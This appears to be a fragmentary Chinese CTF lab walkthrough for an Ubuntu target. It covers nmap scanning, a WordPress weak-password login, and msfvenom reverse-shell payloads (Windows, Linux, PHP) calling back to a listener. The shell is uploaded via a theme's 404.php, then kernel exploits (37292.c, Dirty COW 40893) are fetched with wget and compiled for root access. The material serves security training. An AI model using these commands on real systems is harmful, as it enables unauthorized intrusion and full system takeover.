B-1:系统漏洞利用与提权
任务环境说明:
- 服务器场景:PYsystem001
- 服务器场景操作系统:Ubuntu(显示链接)
- 服务器用户名:未知 密码:未知
- 使用nmap扫描靶机系统,将靶机开放的端口号按从小到大的顺序作为FLAG(形式:[端口1,端口2…,端口n])提交 nmap -sS -T4 -n ip
- 通过上述端口访问靶机系统,使用弱口令进行登录,将正确的用户名和密码作为FLAG(形式:[用户名,密码])提交;dirb 网址找到后台
admin 123456- 利用Kali渗透机生成反弹木马,将生成木马命令执行后提示的第四行的首个单词作为FLAG(形式:[单词])提交

- ;payload
- 对上述木马文件进行修改后上传到靶机系统中,使用MSF开启监听,将获
点击刷子然后点击最后一个进去点击404把木马上传
得的当前权限的用户名作为FLAG(形式:[用户名])提交;

https://192.168.137.233/wordpress/wp-content/twentythirteen/404.php访问回弹shell

![]()
- 查看系统内核版本信息,将系统内核版本号作为FLAG(形式:[版本号])提交;
- 在Kalei中查找可使用的漏洞源码,将找到的漏洞源码文件名作为FLAG(形式:[文件名])提交;37292.c

- 利用上述漏洞源码后获得到的靶机/root下的唯一.txt文件的文件名作为FLAG(形式:[文件名])提交;


- 已经放在kali/root wget http://ip/37292.c

- 进入cd /tmp -P是大写
- 利用上述漏洞源码后将获得到的靶机/root下的唯一.txt文件的文件内容作为FLAG(形式:[文件内容])提交。

- gcc 37292.c -o 37292 chmod 777 37292 ./37292 拿到shell直接cat查看
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.43.5 lport=4444 -f exe >shell.exe
msfvenom -p linux/x64/meterpreter/reverse_tcp lhost=192.168.43.5 lport=4444 -f elf >/root/shell.eif
msfvenom -p php/meterpreter_reverse_tcp LHOST= LPORT= -f raw > shell.php
use exploit /mlti/handler
scp -r /root/test.elf ubunt@ip
uname -an 查看内核版本信息
search tab 内核 可以查看到源码
gcc [漏洞文件] -o [编译后的文件名]
ls
chmod 777 源码
cd /root cat 查看即可
藏牛提权
使用命令uname -a
看到linux的内核版本
只要版本低于3.10直接搜索40893
那个是ubuntu系统的
然后使用gcc -pthread 40893.c -o 1 -lcrypt
415

被折叠的 条评论
为什么被折叠?



